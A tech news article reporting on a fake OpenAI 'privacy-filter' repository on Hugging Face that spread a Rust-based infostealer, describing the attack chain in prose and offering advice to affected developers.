Hugging Face malware has become a serious threat to developers trusting the popular AI model repository. A fake OpenAI repository named “Open-OSS/privacy-filter” impersonated OpenAI’s legitimate Privacy Filter project, reaching the platform’s #1 trending position before HiddenLayer researchers discovered it was distributing infostealer malware on May 7, 2024. The malicious repository accumulated 244,000 downloads and 667 likes before Hugging Face removed it following the security team’s report.
Key Takeaways
- Fake repository typosquatted OpenAI’s Privacy Filter project and copied its model card nearly verbatim.
- Reached #1 on Hugging Face trending list with 244,000 downloads before removal.
- Contained loader.py script deploying Rust-based infostealer targeting browser credentials, Discord tokens, and crypto wallets.
- HiddenLayer linked infrastructure to other malicious repositories and npm typosquatting campaigns.
- Majority of 667 likes appear auto-generated, suggesting artificial popularity inflation.
How the Hugging Face Malware Attack Worked
The malicious repository used a deceptively simple execution chain to compromise Windows systems. The loader.py file contained fake AI-related code designed to appear harmless to casual inspection, but it disabled SSL verification, decoded a base64-encoded URL, and fetched a JSON payload from an external resource. Once the payload arrived, the script executed a PowerShell command chain that deployed and ran a Rust-based infostealer malware. This multi-stage approach gave attackers flexibility to update their payload without modifying the repository itself.
The infostealer targeted sensitive data across multiple attack surfaces. It harvested browser credentials, Discord tokens, cryptocurrency wallet information, SSH/FTP/VPN configurations, and system data before exfiltrating everything to a command-and-control server. The malware included extensive anti-analysis features to evade detection by security researchers and automated scanners, making it harder to reverse-engineer and understand the full scope of the threat.
Why Hugging Face Became a Malware Distribution Vector
The attack exploited fundamental trust dynamics within the AI developer community. OpenAI’s legitimate Privacy Filter is a real project for filtering sensitive data in AI training, giving the fake repository credibility at first glance. By copying the model card nearly verbatim, attackers leveraged Hugging Face’s own documentation system against the platform. The repository’s rapid climb to #1 trending status exposed a critical gap in platform moderation—artificial popularity inflation through auto-generated likes and downloads went undetected until researchers manually investigated.
This incident reflects a broader vulnerability in AI platforms as malware distribution channels. Unlike traditional software repositories with stricter code review processes, Hugging Face prioritizes accessibility and rapid community contribution. While that openness benefits legitimate researchers, it also lowers barriers for attackers. The fact that 667 likes came primarily from auto-generated accounts suggests sophisticated automation was used to game the trending algorithm itself, making the malicious repository appear more legitimate and trustworthy.
Connected Infrastructure and Broader Threat Landscape
HiddenLayer researchers linked the malicious Hugging Face repository to other attack infrastructure, uncovering a coordinated campaign spanning multiple platforms. The same threat actors behind this repository operated other malicious Hugging Face repositories and conducted a separate npm typosquatting campaign distributing the “WinOS 4.0” implant. This pattern suggests an organized operation with resources to maintain multiple attack vectors simultaneously.
The broader context includes earlier discoveries of malicious ML models on Hugging Face using different techniques. ReversingLabs identified malicious repositories in January 2024 exploiting the “nullifAI” technique, which abused Pickle file serialization in Python to hide malicious code within model files. Those repositories (glockr1/ballr7 and who-r-u0000/0000000000000000000000000000000000000) were not initially flagged by Hugging Face’s automated scanners and remained live for 24 hours after being reported. These incidents demonstrate that attackers are actively experimenting with multiple malware delivery mechanisms on the platform.
What Developers Need to Know
The exact victim count from this campaign remains unclear, but the 244,000 downloads represent a significant exposure window. Developers who downloaded the fake repository during its 48 hours at #1 trending should assume potential compromise if they executed the code on Windows systems. The infostealer’s targets—browser credentials, Discord tokens, and cryptocurrency wallets—suggest attackers were after both personal data and financial assets. Anyone who downloaded the repository should change passwords for affected accounts, rotate API keys, and check for unauthorized access to cryptocurrency wallets and Discord accounts.
Hugging Face has taken steps to remove the malicious repository and presumably tightened detection, but the incident highlights why developers must verify project authenticity before downloading. Check official GitHub repositories, verify maintainer accounts against known community members, and be skeptical of newly trending projects with limited history. The Privacy Filter project’s legitimate status made the typosquatting effective—attackers banked on developers trusting the name without verifying the source.
Has Hugging Face improved its security since this incident?
Hugging Face removed the malicious repository and responded to HiddenLayer’s report, but the platform has not publicly detailed specific detection improvements. The fact that auto-generated likes and downloads reached such scale before detection suggests ongoing gaps in behavioral analysis and anomaly detection systems. Developers should continue treating Hugging Face downloads with the same caution they would apply to any third-party code source.
How can developers verify a Hugging Face repository is legitimate?
Cross-reference the repository URL with official sources from the project’s website or verified social media accounts. Check the maintainer’s profile history and community reputation. Be wary of repositories with sudden spikes in downloads or likes, especially from new accounts. For critical projects like OpenAI’s tools, always verify through OpenAI’s official GitHub organization or documentation before downloading.
What should I do if I downloaded the fake OpenAI repository?
If you executed the loader.py file on a Windows system, assume potential compromise and immediately change all passwords, particularly for email, banking, and cryptocurrency accounts. Disconnect the affected machine from networks with sensitive data, run updated antivirus scans, and consider a full OS reinstall if the system had access to sensitive credentials. For less critical systems, monitor for suspicious activity and enable two-factor authentication on all accounts accessed from that machine.
The Hugging Face malware incident exposes a hard truth: popularity and trending status are not security assurances. As AI platforms become central infrastructure for developers worldwide, attackers will continue exploiting trust dynamics and platform mechanics to distribute malware at scale. The responsibility for verification ultimately falls on individual developers—verify sources, scrutinize downloads, and assume nothing is safe until independently confirmed.
Edited by the All Things Geek team.
Source: TechRadar
